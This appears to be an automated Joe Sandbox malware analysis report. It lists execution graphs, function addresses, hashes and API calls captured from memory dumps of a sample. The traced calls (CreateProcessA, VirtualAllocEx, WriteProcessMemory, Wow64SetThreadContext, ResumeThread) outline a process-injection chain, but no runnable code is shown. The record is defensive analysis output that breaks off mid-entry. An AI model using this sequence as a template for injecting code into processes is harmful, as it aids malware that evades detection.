                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_6b20000_tfF3UBTdr8.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 873239ca661b9ccd5f690441870f2ed59bda0db56e784f56d84624124ac52c58
                        • Instruction ID: 83157d870722af08ae575e7fcb188d1fecec4295cf969d09935852d0a510a9d5
                        • Opcode Fuzzy Hash: 873239ca661b9ccd5f690441870f2ed59bda0db56e784f56d84624124ac52c58
                        • Instruction Fuzzy Hash: DCF0507B6043E28FC7060A2998005A57FB9DF8622575D40E7D54EC7212F7269817CFA2

                        Non-executed Functions

                        Function 06B20D50 Relevance: 10.3, Strings: 8, Instructions: 297COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000009.00000002.2225170930.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_6b20000_tfF3UBTdr8.jbxd
                        Similarity
                        • API ID:
                        • String ID: $sq$$sq$$sq$$sq$$sq$$sq$$sq$$sq
                        • API String ID: 0-3003498
                        • Opcode ID: 71079fd3cc3f8ae9ba483ff03f0da262b9d8093796308eb8eb612b9b624c16bf
                        • Instruction ID: 48f376c219b3948882b7562d71accfe5eae1055bc9f43bca75ff5a6b485530db
                        • Opcode Fuzzy Hash: 71079fd3cc3f8ae9ba483ff03f0da262b9d8093796308eb8eb612b9b624c16bf
                        • Instruction Fuzzy Hash: 32B1BE70B142569FDB44EB69C844A7EBBF6FF88210F1484AAD40ACB3A1DB35DC41CB91

                        Execution Graph

                        Execution Coverage:12%
                        Dynamic/Decrypted Code Coverage:100%
                        Signature Coverage:0%
                        Total number of Nodes:178
                        Total number of Limit Nodes:12
                        execution_graph 20039 76ca9c8 20040 76ca9ee 20039->20040 20041 76cab53 20039->20041 20040->20041 20043 76c8168 20040->20043 20044 76cac48 PostMessageW 20043->20044 20045 76cacb4 20044->20045 20045->20040 19811 2e04668 19812 2e0467a 19811->19812 19813 2e04686 19812->19813 19815 2e04778 19812->19815 19816 2e0479d 19815->19816 19820 2e04888 19816->19820 19824 2e04879 19816->19824 19821 2e048af 19820->19821 19822 2e0498c 19821->19822 19828 2e044b4 19821->19828 19825 2e04888 19824->19825 19826 2e044b4 CreateActCtxA 19825->19826 19827 2e0498c 19825->19827 19826->19827 19829 2e05918 CreateActCtxA 19828->19829 19831 2e059db 19829->19831 19832 2e0ee38 19835 2e0ef30 19832->19835 19833 2e0ee47 19836 2e0ef41 19835->19836 19837 2e0ef64 19835->19837 19836->19837 19842 2e0f1c8 19836->19842 19837->19833 19838 2e0ef5c 19838->19837 19839 2e0f168 GetModuleHandleW 19838->19839 19840 2e0f195 19839->19840 19840->19833 19843 2e0f1dc 19842->19843 19845 2e0f201 19843->19845 19846 2e0e960 19843->19846 19845->19838 19847 2e0f3a8 LoadLibraryExW 19846->19847 19849 2e0f421 19847->19849 19849->19845 19850 76c7bf5 19851 76c79dc 19850->19851 19852 76c79eb 19851->19852 19856 76c984e 19851->19856 19877 76c97d8 19851->19877 19897 76c97e8 19851->19897 19857 76c97dc 19856->19857 19858 76c9851 19856->19858 19917 76ca156 19857->19917 19921 76ca096 19857->19921 19925 76ca594 19857->19925 19929 76ca55b 19857->19929 19933 76c9f1f 19857->19933 19937 76c9ddc 19857->19937 19941 76c9cdc 19857->19941 19946 76ca1c1 19857->19946 19952 76c9dc1 19857->19952 19957 76c9d00 19857->19957 19962 76c9e67 19857->19962 19967 76c9e04 19857->19967 19971 76ca4ad 19857->19971 19975 76c9e90 19857->19975 19979 76c9c90 19857->19979 19984 76c9c30 19857->19984 19991 76ca017 19857->19991 19858->19852 19859 76c980a 19859->19852 19878 76c97dc 19877->19878 19880 76ca4ad ResumeThread 19878->19880 19881 76c9e04 2 API calls 19878->19881 19882 76c9e67 2 API calls 19878->19882 19883 76c9d00 2 API calls 19878->19883 19884 76c9dc1 2 API calls 19878->19884 19885 76ca1c1 2 API calls 19878->19885 19886 76c9cdc 2 API calls 19878->19886 19887 76c9ddc 2 API calls 19878->19887 19888 76c9f1f ResumeThread 19878->19888 19889 76ca55b 2 API calls 19878->19889 19890 76ca594 2 API calls 19878->19890 19891 76ca096 ResumeThread 19878->19891 19892 76ca156 2 API calls 19878->19892 19893 76ca017 ResumeThread 19878->19893 19894 76c9c30 4 API calls 19878->19894 19895 76c9c90 2 API calls 19878->19895 19896 76c9e90 2 API calls 19878->19896 19879 76c980a 19879->19852 19880->19879 19881->19879 19882->19879 19883->19879 19884->19879 19885->19879 19886->19879 19887->19879 19888->19879 19889->19879 19890->19879 19891->19879 19892->19879 19893->19879 19894->19879 19895->19879 19896->19879 19898 76c9802 19897->19898 19900 76ca4ad ResumeThread 19898->19900 19901 76c9e04 2 API calls 19898->19901 19902 76c9e67 2 API calls 19898->19902 19903 76c9d00 2 API calls 19898->19903 19904 76c9dc1 2 API calls 19898->19904 19905 76ca1c1 2 API calls 19898->19905 19906 76c9cdc 2 API calls 19898->19906 19907 76c9ddc 2 API calls 19898->19907 19908 76c9f1f ResumeThread 19898->19908 19909 76ca55b 2 API calls 19898->19909 19910 76ca594 2 API calls 19898->19910 19911 76ca096 ResumeThread 19898->19911 19912 76ca156 2 API calls 19898->19912 19913 76ca017 ResumeThread 19898->19913 19914 76c9c30 4 API calls 19898->19914 19915 76c9c90 2 API calls 19898->19915 19916 76c9e90 2 API calls 19898->19916 19899 76c980a 19899->19852 19900->19899 19901->19899 19902->19899 19903->19899 19904->19899 19905->19899 19906->19899 19907->19899 19908->19899 19909->19899 19910->19899 19911->19899 19912->19899 19913->19899 19914->19899 19915->19899 19916->19899 19995 76c7271 19917->19995 19999 76c7278 19917->19999 19918 76ca174 19922 76c9f36 19921->19922 19923 76ca4ba 19922->19923 20003 76c70f0 19922->20003 20007 76c7338 19925->20007 20011 76c7330 19925->20011 19926 76ca5b8 20015 76c7199 19929->20015 20019 76c71a0 19929->20019 19930 76ca575 19934 76c9f25 19933->19934 19935 76ca4ba 19934->19935 19936 76c70f0 ResumeThread 19934->19936 19936->19934 19938 76ca3fd 19937->19938 19939 76c7338 WriteProcessMemory 19938->19939 19940 76c7330 WriteProcessMemory 19938->19940 19939->19938 19940->19938 19942 76c9c9c 19941->19942 19943 76c9cae 19942->19943 19944 76c7338 WriteProcessMemory 19942->19944 19945 76c7330 WriteProcessMemory 19942->19945 19943->19859 19944->19942 19945->19942 19947 76c9e8f 19946->19947 19948 76ca554 19947->19948 19950 76c7199 Wow64SetThreadContext 19947->19950 19951 76c71a0 Wow64SetThreadContext 19947->19951 19948->19859 19949 76c9eaa 19949->19859 19950->19949 19951->19949 19953 76c9c9c 19952->19953 19954 76c9cae 19953->19954 19955 76c7338 WriteProcessMemory 19953->19955 19956 76c7330 WriteProcessMemory 19953->19956 19954->19859 19955->19953 19956->19953 19958 76c9c9c 19957->19958 19959 76c9cae 19958->19959 19960 76c7338 WriteProcessMemory 19958->19960 19961 76c7330 WriteProcessMemory 19958->19961 19959->19859 19960->19958 19961->19958 19963 76c9c9c 19962->19963 19963->19962 19964 76c9cae 19963->19964 19965 76c7338 WriteProcessMemory 19963->19965 19966 76c7330 WriteProcessMemory 19963->19966 19964->19859 19965->19963 19966->19963 20023 76c7428 19967->20023 20027 76c7420 19967->20027 19968 76c9db0 19968->19859 19972 76ca4ba 19971->19972 19973 76c9f36 19971->19973 19973->19971 19974 76c70f0 ResumeThread 19973->19974 19974->19973 19977 76c7199 Wow64SetThreadContext 19975->19977 19978 76c71a0 Wow64SetThreadContext 19975->19978 19976 76c9eaa 19976->19859 19977->19976 19978->19976 19980 76c9c9c 19979->19980 19981 76c9cae 19980->19981 19982 76c7338 WriteProcessMemory 19980->19982 19983 76c7330 WriteProcessMemory 19980->19983 19981->19859 19982->19980 19983->19980 20031 76c75b4 19984->20031 20035 76c75c0 19984->20035 19992 76c9f36 19991->19992 19993 76ca4ba 19992->19993 19994 76c70f0 ResumeThread 19992->19994 19994->19992 19996 76c72b8 VirtualAllocEx 19995->19996 19998 76c72f5 19996->19998 19998->19918 20000 76c72b8 VirtualAllocEx 19999->20000 20002 76c72f5 20000->20002 20002->19918 20004 76c7130 ResumeThread 20003->20004 20006 76c7161 20004->20006 20006->19922 20008 76c7380 WriteProcessMemory 20007->20008 20010 76c73d7 20008->20010 20010->19926 20012 76c7380 WriteProcessMemory 20011->20012 20014 76c73d7 20012->20014 20014->19926 20016 76c71e5 Wow64SetThreadContext 20015->20016 20018 76c722d 20016->20018 20018->19930 20020 76c71e5 Wow64SetThreadContext 20019->20020 20022 76c722d 20020->20022 20022->19930 20024 76c7473 ReadProcessMemory 20023->20024 20026 76c74b7 20024->20026 20026->19968 20028 76c7473 ReadProcessMemory 20027->20028 20030 76c74b7 20028->20030 20030->19968 20032 76c7649 CreateProcessA 20031->20032 20034 76c780b 20032->20034 20034->20034 20036 76c7649 CreateProcessA 20035->20036 20038 76c780b 20036->20038 20038->20038

                        Executed Functions

                        Function 076C75B4 Relevance: 1.7, APIs: 1, Instructions: 249processCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 503 76c75b4-76c7655 505 76c768e-76c76ae 503->505 506 76c7657-76c7661 503->506 511 76c76e7-76c7716 505->511 512 76c76b0-76c76ba 505->512 506->505 507 76c7663-76c7665 506->507 509 76c7688-76c768b 507->509 510 76c7667-76c7671 507->510 509->505 513 76c7675-76c7684 510->513 514 76c7673 510->514 522 76c774f-76c7809 CreateProcessA 511->522 523 76c7718-76c7722 511->523 512->511 515 76c76bc-76c76be 512->515 513->513 516 76c7686 513->516 514->513 517 76c76c0-76c76ca 515->517 518 76c76e1-76c76e4 515->518 516->509 520 76c76cc 517->520 521 76c76ce-76c76dd 517->521 518->511 520->521 521->521 524 76c76df 521->524 534 76c780b-76c7811 522->534 535 76c7812-76c7898 522->535 523->522 525 76c7724-76c7726 523->525 524->518 526 76c7728-76c7732 525->526 527 76c7749-76c774c 525->527 529 76c7734 526->529 530 76c7736-76c7745 526->530 527->522 529->530 530->530 531 76c7747 530->531 531->527 534->535 545 76c78a8-76c78ac 535->545 546 76c789a-76c789e 535->546 548 76c78bc-76c78c0 545->548 549 76c78ae-76c78b2 545->549 546->545 547 76c78a0 546->547 547->545 551 76c78d0-76c78d4 548->551 552 76c78c2-76c78c6 548->552 549->548 550 76c78b4 549->550 550->548 554 76c78e6-76c78ed 551->554 555 76c78d6-76c78dc 551->555 552->551 553 76c78c8 552->553 553->551 556 76c78ef-76c78fe 554->556 557 76c7904 554->557 555->554 556->557 559 76c7905 557->559 559->559
                        APIs
                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 076C77F6
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2199071359.00000000076C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076C0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_76c0000_WltfeVzR.jbxd
                        Similarity
                        • API ID: CreateProcess
                        • String ID:
                        • API String ID: 963392458-0
                        • Opcode ID: bcbe95181ee7333480704f7cf815f581e82e5d8f6a5b749ae2ff87eb936f787a
                        • Instruction ID: 04420b43776e539e6d1eef071e47571b548cf6abfb2c67b384ab7c9d7c11b480
                        • Opcode Fuzzy Hash: bcbe95181ee7333480704f7cf815f581e82e5d8f6a5b749ae2ff87eb936f787a
                        • Instruction Fuzzy Hash: 3FA14BB1D0021ADFDF24CF69C9417EDBBB6EF48310F1485AAE819A7240DB749985CF91
                        Function 076C75C0 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 560 76c75c0-76c7655 562 76c768e-76c76ae 560->562 563 76c7657-76c7661 560->563 568 76c76e7-76c7716 562->568 569 76c76b0-76c76ba 562->569 563->562 564 76c7663-76c7665 563->564 566 76c7688-76c768b 564->566 567 76c7667-76c7671 564->567 566->562 570 76c7675-76c7684 567->570 571 76c7673 567->571 579 76c774f-76c7809 CreateProcessA 568->579 580 76c7718-76c7722 568->580 569->568 572 76c76bc-76c76be 569->572 570->570 573 76c7686 570->573 571->570 574 76c76c0-76c76ca 572->574 575 76c76e1-76c76e4 572->575 573->566 577 76c76cc 574->577 578 76c76ce-76c76dd 574->578 575->568 577->578 578->578 581 76c76df 578->581 591 76c780b-76c7811 579->591 592 76c7812-76c7898 579->592 580->579 582 76c7724-76c7726 580->582 581->575 583 76c7728-76c7732 582->583 584 76c7749-76c774c 582->584 586 76c7734 583->586 587 76c7736-76c7745 583->587 584->579 586->587 587->587 588 76c7747 587->588 588->584 591->592 602 76c78a8-76c78ac 592->602 603 76c789a-76c789e 592->603 605 76c78bc-76c78c0 602->605 606 76c78ae-76c78b2 602->606 603->602 604 76c78a0 603->604 604->602 608 76c78d0-76c78d4 605->608 609 76c78c2-76c78c6 605->609 606->605 607 76c78b4 606->607 607->605 611 76c78e6-76c78ed 608->611 612 76c78d6-76c78dc 608->612 609->608 610 76c78c8 609->610 610->608 613 76c78ef-76c78fe 611->613 614 76c7904 611->614 612->611 613->614 616 76c7905 614->616 616->616
                        APIs
                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 076C77F6
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2199071359.00000000076C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076C0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_76c0000_WltfeVzR.jbxd
                        Similarity
                        • API ID: CreateProcess
                        • String ID:
                        • API String ID: 963392458-0
                        • Opcode ID: 5d2600101c9c695e17f37eaedff60e659c02fda72e217332fd88c5b2f7a6b580
                        • Instruction ID: 0ac232e44f4289f156d4d95e868ded22ff16b59dc30ab8b90312551c15311274
                        • Opcode Fuzzy Hash: 5d2600101c9c695e17f37eaedff60e659c02fda72e217332fd88c5b2f7a6b580
                        • Instruction Fuzzy Hash: FA913CB1D0021ADFDF24CF69C941BADBBB6FF48310F1485A9E819A7240DB749985CF91
                        Function 02E0EF30 Relevance: 1.7, APIs: 1, Instructions: 198COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 617 2e0ef30-2e0ef3f 618 2e0ef41-2e0ef4e call 2e0c478 617->618 619 2e0ef6b-2e0ef6f 617->619 626 2e0ef50-2e0ef5e call 2e0f1c8 618->626 627 2e0ef64 618->627 620 2e0ef71-2e0ef7b 619->620 621 2e0ef83-2e0efc4 619->621 620->621 628 2e0efd1-2e0efdf 621->628 629 2e0efc6-2e0efce 621->629 626->627 636 2e0f0a0-2e0f160 626->636 627->619 630 2e0efe1-2e0efe6 628->630 631 2e0f003-2e0f005 628->631 629->628 634 2e0eff1 630->634 635 2e0efe8-2e0efef call 2e0e904 630->635 633 2e0f008-2e0f00f 631->633 637 2e0f011-2e0f019 633->637 638 2e0f01c-2e0f023 633->638 640 2e0eff3-2e0f001 634->640 635->640 668 2e0f162-2e0f165 636->668 669 2e0f168-2e0f193 GetModuleHandleW 636->669 637->638 641 2e0f030-2e0f039 call 2e0e914 638->641 642 2e0f025-2e0f02d 638->642 640->633 648 2e0f046-2e0f04b 641->648 649 2e0f03b-2e0f043 641->649 642->641 650 2e0f069-2e0f076 648->650 651 2e0f04d-2e0f054 648->651 649->648 657 2e0f078-2e0f096 650->657 658 2e0f099-2e0f09f 650->658 651->650 653 2e0f056-2e0f066 call 2e0e924 call 2e0e934 651->653 653->650 657->658 668->669 670 2e0f195-2e0f19b 669->670 671 2e0f19c-2e0f1b0 669->671 670->671
                        APIs
                        • GetModuleHandleW.KERNELBASE(00000000), ref: 02E0F186
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2195531275.0000000002E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E00000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_2e00000_WltfeVzR.jbxd
                        Similarity
                        • API ID: HandleModule
                        • String ID:
                        • API String ID: 4139908857-0
                        • Opcode ID: e048aa5c759243b6c3099036a9904737d67966be0444b1d9680500237237b9d3
                        • Instruction ID: 4486afbd78bb113f4f75824b7f586ce21e4c9d61ac374bc7729d881e752cec2d
                        • Opcode Fuzzy Hash: e048aa5c759243b6c3099036a9904737d67966be0444b1d9680500237237b9d3
                        • Instruction Fuzzy Hash: AC7139B0A00B058FDB64DF2AD48475ABBF1FF88304F04892DD446D7A90DB75E896CB91
                        Function 02E0590C Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 792 2e0590c-2e05913 793 2e05918-2e059d9 CreateActCtxA 792->793 795 2e059e2-2e05a3c 793->795 796 2e059db-2e059e1 793->796 803 2e05a4b-2e05a4f 795->803 804 2e05a3e-2e05a41 795->804 796->795 805 2e05a60-2e05a90 803->805 806 2e05a51-2e05a5d 803->806 804->803 810 2e05a42-2e05a4a 805->810 811 2e05a92-2e05b14 805->811 806->805 810->803
                        APIs
                        • CreateActCtxA.KERNEL32(?), ref: 02E059C9
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2195531275.0000000002E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E00000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_2e00000_WltfeVzR.jbxd
                        Similarity
                        • API ID: Create
                        • String ID:
                        • API String ID: 2289755597-0
                        • Opcode ID: d0adbf4ee0106a116fbc0d2df17cc495bd47aab1fe581a4cb12e25728dffa470
                        • Instruction ID: 5c91bfb37d40e2ab3d90ebdfb538f2b45aa0cdbabb93eca2bbf06b959bba8c63
                        • Opcode Fuzzy Hash: d0adbf4ee0106a116fbc0d2df17cc495bd47aab1fe581a4cb12e25728dffa470
                        • Instruction Fuzzy Hash: 6641D2B0C0061DCADB24DFAAC984B8EBBF5FF48304F60845AD408AB255DB75694ACF90
                        Function 02E044B4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 813 2e044b4-2e059d9 CreateActCtxA 816 2e059e2-2e05a3c 813->816 817 2e059db-2e059e1 813->817 824 2e05a4b-2e05a4f 816->824 825 2e05a3e-2e05a41 816->825 817->816 826 2e05a60-2e05a90 824->826 827 2e05a51-2e05a5d 824->827 825->824 831 2e05a42-2e05a4a 826->831 832 2e05a92-2e05b14 826->832 827->826 831->824
                        APIs
                        • CreateActCtxA.KERNEL32(?), ref: 02E059C9
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2195531275.0000000002E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E00000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_2e00000_WltfeVzR.jbxd
                        Similarity
                        • API ID: Create
                        • String ID:
                        • API String ID: 2289755597-0
                        • Opcode ID: 6c7110f4d6fa3c5be5901b8c7d48a9b56e36e2bbd3ef783c1038ef09ad9cf8c6
                        • Instruction ID: df7046ba7a8a8f88849e9998ebf486e63c616c416d598ca3f994c1a549f002db
                        • Opcode Fuzzy Hash: 6c7110f4d6fa3c5be5901b8c7d48a9b56e36e2bbd3ef783c1038ef09ad9cf8c6
                        • Instruction Fuzzy Hash: 5A41C2B0C0061DCBDB24DFAAC984B9EBBF5FF49304F60845AD408AB255DB75694ACF90
                        Function 076C7330 Relevance: 1.6, APIs: 1, Instructions: 73injectionCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 834 76c7330-76c7386 836 76c7388-76c7394 834->836 837 76c7396-76c73d5 WriteProcessMemory 834->837 836->837 839 76c73de-76c740e 837->839 840 76c73d7-76c73dd 837->840 840->839
                        APIs
                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 076C73C8
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2199071359.00000000076C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076C0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_76c0000_WltfeVzR.jbxd
                        Similarity
                        • API ID: MemoryProcessWrite
                        • String ID:
                        • API String ID: 3559483778-0
                        • Opcode ID: 3a81b77e2b245fc03b5e9df7280540ff7c69e0d29007f1229bd3e118e5826e0e
                        • Instruction ID: 48cae920a128746918cfbac5b6aaab2b65ae55b528090871f296f69417dee16a
                        • Opcode Fuzzy Hash: 3a81b77e2b245fc03b5e9df7280540ff7c69e0d29007f1229bd3e118e5826e0e
                        • Instruction Fuzzy Hash: 12214BB19003499FDB10CFA9D881BEEBBF5FF48320F10882AE919A7340D7749540CBA0
                        Function 076C7338 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 844 76c7338-76c7386 846 76c7388-76c7394 844->846 847 76c7396-76c73d5 WriteProcessMemory 844->847 846->847 849 76c73de-76c740e 847->849 850 76c73d7-76c73dd 847->850 850->849
                        APIs
                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 076C73C8
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2199071359.00000000076C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076C0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_76c0000_WltfeVzR.jbxd
                        Similarity
                        • API ID: MemoryProcessWrite
                        • String ID:
                        • API String ID: 3559483778-0
                        • Opcode ID: e6ad6635f4da971a2ee901dfeb5dc203826dd974683d0f749d80a37a08c0c457
                        • Instruction ID: 2fe2e59919dadce3c3d4225f06f9f7712811e93c4f74557702e1a6d956801876
                        • Opcode Fuzzy Hash: e6ad6635f4da971a2ee901dfeb5dc203826dd974683d0f749d80a37a08c0c457
                        • Instruction Fuzzy Hash: 522128B19003599FCB10CFA9C985BEEBBF5FF48310F108829E919A7340D7789944DBA4
                        Function 076C7420 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 854 76c7420-76c74b5 ReadProcessMemory 857 76c74be-76c74ee 854->857 858 76c74b7-76c74bd 854->858 858->857
                        APIs
                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 076C74A8
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2199071359.00000000076C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076C0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_76c0000_WltfeVzR.jbxd
                        Similarity
                        • API ID: MemoryProcessRead
                        • String ID:
                        • API String ID: 1726664587-0
                        • Opcode ID: 0ec51c07dbbe895cb55a37a9caeb4dd003747664cfdf715b23706518bdf4608c
                        • Instruction ID: 04eb78e0ef3632d667df5fc3f9efac6070903b300fd5c493dd22c53e5a7d55d5
                        • Opcode Fuzzy Hash: 0ec51c07dbbe895cb55a37a9caeb4dd003747664cfdf715b23706518bdf4608c
                        • Instruction Fuzzy Hash: 922139B1D003099FCB10CFA9C981AEEBBF5FF48320F20882AE519A7640C7399504DBA0
                        Function 076C7199 Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 862 76c7199-76c71eb 864 76c71ed-76c71f9 862->864 865 76c71fb-76c722b Wow64SetThreadContext 862->865 864->865 867 76c722d-76c7233 865->867 868 76c7234-76c7264 865->868 867->868
                        APIs
                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 076C721E
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2199071359.00000000076C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076C0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_76c0000_WltfeVzR.jbxd
                        Similarity
                        • API ID: ContextThreadWow64
                        • String ID:
                        • API String ID: 983334009-0
                        • Opcode ID: 4990b4568f010810d8c03521b5fe23826f2bbc456f8642d085ec124ec81dbba9
                        • Instruction ID: 81fd558146d9620aecc412f5da06592ae6805e9444d34c729aa226f64abe2d41
                        • Opcode Fuzzy Hash: 4990b4568f010810d8c03521b5fe23826f2bbc456f8642d085ec124ec81dbba9
                        • Instruction Fuzzy Hash: 5D2107B59003098FDB14CFAAC5857EEBBF4EF48324F24842AD559A7240C7789945CFA1
                        Function 076C7428 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                        Download Yara Rule
                        APIs
                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 076C74A8
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2199071359.00000000076C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076C0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_76c0000_WltfeVzR.jbxd
                        Similarity
                        • API ID: MemoryProcessRead
                        • String ID:
                        • API String ID: 1726664587-0
                        • Opcode ID: 6faf2ff855cf8cf25ce9ca178c2c06aa0481e80b0108be7f22f390ced3e64ed6
                        • Instruction ID: 60850fd2f07ad2b226b2611d0f889ec64a552abaf2efb33f22677a33a676c082
                        • Opcode Fuzzy Hash: 6faf2ff855cf8cf25ce9ca178c2c06aa0481e80b0108be7f22f390ced3e64ed6
                        • Instruction Fuzzy Hash: A1212AB19003599FCB10CFAAC845AEEBBF5FF48320F108429E519A7240C7799904DBA0
                        Function 076C71A0 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                        Download Yara Rule
                        APIs
                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 076C721E
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2199071359.00000000076C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076C0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_76c0000_WltfeVzR.jbxd
                        Similarity
                        • API ID: ContextThreadWow64
                        • String ID:
                        • API String ID: 983334009-0
                        • Opcode ID: f62da7cb9399845c4675ffcb13eae1b14ca6281b63485fc1cded325e75bfe1a2
                        • Instruction ID: 08470128f025224a2e35b1603b5b4ac4e2e94991420db1da93aa797b4d4b9c03
                        • Opcode Fuzzy Hash: f62da7cb9399845c4675ffcb13eae1b14ca6281b63485fc1cded325e75bfe1a2
                        • Instruction Fuzzy Hash: A12118B19003099FDB10DFAAC4857AEBBF4EF88324F14842AD559A7340C7789945CFA5
                        Function 076C7271 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                        Download Yara Rule
                        APIs
                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 076C72E6
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2199071359.00000000076C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076C0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_76c0000_WltfeVzR.jbxd
                        Similarity
                        • API ID: AllocVirtual
                        • String ID:
                        • API String ID: 4275171209-0
                        • Opcode ID: 689db1b12b9441b16949bd3ef293d822798832bad5fc057b6d7cf43482ce08c3
                        • Instruction ID: 7b1bb9fc70794966459db344549773c5056a97b7e17fdd0d9493951c0ec5e385
                        • Opcode Fuzzy Hash: 689db1b12b9441b16949bd3ef293d822798832bad5fc057b6d7cf43482ce08c3
                        • Instruction Fuzzy Hash: 3C117CB29002499FCB10DFAAC845BEEBFF5EF88320F20881AE519A7350C7759940CF90
                        Function 02E0E960 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                        Download Yara Rule
                        APIs
                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02E0F201,00000800,00000000,00000000), ref: 02E0F412
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2195531275.0000000002E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E00000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_2e00000_WltfeVzR.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: e9cf8822cab5d4d9e028269a2d04cc292059fe481cf39a6775f96e3f2bbcc6dd
                        • Instruction ID: c4b0a56f928791c9e427e3ac70e9d5da1340274386feb1a170e15c36bf2b456a
                        • Opcode Fuzzy Hash: e9cf8822cab5d4d9e028269a2d04cc292059fe481cf39a6775f96e3f2bbcc6dd
                        • Instruction Fuzzy Hash: BF1106B59002499FDB20CF9AC484ADEFBF4FB88324F10842AD819A7640C779A545CFA4
                        Function 076C7278 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                        Download Yara Rule
                        APIs
                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 076C72E6
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2199071359.00000000076C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076C0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_76c0000_WltfeVzR.jbxd
                        Similarity
                        • API ID: AllocVirtual
                        • String ID:
                        • API String ID: 4275171209-0
                        • Opcode ID: c555cfe87bbe9043c1cdda1c8029650909c12c9cfd2bd7e4c5c26589aedfdfad
                        • Instruction ID: e8306ca53e2a6b221a5173f352c36b03fd66792cb89ed9bff37b8169b7cf796a
                        • Opcode Fuzzy Hash: c555cfe87bbe9043c1cdda1c8029650909c12c9cfd2bd7e4c5c26589aedfdfad
